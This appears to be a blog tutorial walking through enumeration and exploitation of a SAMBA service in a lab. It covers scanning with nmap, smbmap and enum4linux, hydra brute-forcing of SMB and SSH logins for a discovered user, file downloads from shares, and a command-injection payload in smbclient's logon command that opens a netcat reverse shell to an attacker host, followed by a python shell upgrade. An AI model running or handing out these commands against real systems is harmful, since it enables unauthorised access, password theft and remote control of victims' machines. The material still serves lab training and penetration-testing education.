Enumerating and Exploiting SAMBA

The following article contains instructions on enumerating and exploiting the SAMBA service.  Enumeration for the most part does not change.  However depending on the information gathered, you may be brought in a different direction then you originally thought you were going to go.  Exploitation changes based on a number of different factors.  For example SAMBA version will determine which particular metasploit exploit you will use.  Versioning can also bring us to a wide variety of available scripts which can be found with searchsploit.  

Below you will find usage of tools such as smbmap, smbclient, enum4linux and  metasploit

We want to begin by doing some initial discovery of our target machine.  I always start with a stealth scan to see what comes back quickly.  Additional scans should be conducted to gather more information, especially versioning.  However for our purposes we are happy with the information gained.  At this point we know that there is potentially files being shared.  We will know more when we attempt mapping.

#nmap -sS -T4 <IP>

Attempt mapping
#smbmap -H <IP>

In this particular lab environment we are working with a linux OS.  As soon we know this we can use a tool called "enum4linux"
#enum4linux -a <IP>

Below you will see some additional images that reveal valuable information about the target.  Enum4linux can come back with a ton of information I have cropped out the valuable stuff.  Make sure to read all the output when you run it so that you do not miss any valuable information.

Enumeration user accounts.  Additionally you can see that it is is checking SIDs that have empty user/passwords

User found!

We know there is a user called "gordon" we are going to attempt to brute the SMB.  In this picture you can see a brute force, however it comes back with nothing.
#hydra -l "gordon" -p /usr/share/wordlists/rockyou.txt <IP> smb

While the the smb brute force came back with nothing, from our initial scan we did see the ssh service.  Let's brute force it.  (Keep in mind that this is a lab environment and that it is a "perfect" environment.  Brute force attacks are not a go-to maneuver for me).  We have gordon's password!  From here we would connect to the ssh service with his username and password.  We have gained access now, but let's go back and pretend that we didn't get Gordon's password.  
#hydra -l "gordon" -P /usr/share/wordlists/rockyou.txt <IP> ssh

Now that we know a share is available we can check it out with smbmap
#smbmap -H <IP> -r <share name>

In the previous command we discovered that there was a directory called "saved" let's dig deeper into this share and see what is in the saved directory
#smbmap -H <IP> -r <share name>\\<directory>

We how have a file we would like to look at, so let's actually download it.
#smbmap -H <IP> --download <share name>\\<fileyouwant>

Check for anonymous access through the ftp like tool smbclient.  In this particular scenaio we did not have access.
#smbclient -N -L \\\\<IP>\\


Open listener on attacking machine
#nc -nlvp 4444
Does the share have READ/WRITE enabled?  If so you could be able to conduct a reverse shell.  Here is how you do a reverse shell from smbclient

You have connected and have a FTP like terminal.
#logon "/=`nc <attackerIP> <listeningPort> -e /bin/bash`"

Navigate to the terminal where your listener was running.

The current reverse shell is limited so let's upgrade it with python.  Depending on your target you may have to modify which python you use (python2,python3, etc.)
#python -c 'import pty; pty.spawn("/bin/bash");'

Similar result can happen through metasploit.  The picture below shows proper configuration for exploiting a samba service 3.0.20.  This may not work for you that is why you need to do proper enumeration to discover the versions of the services running.


Popular Posts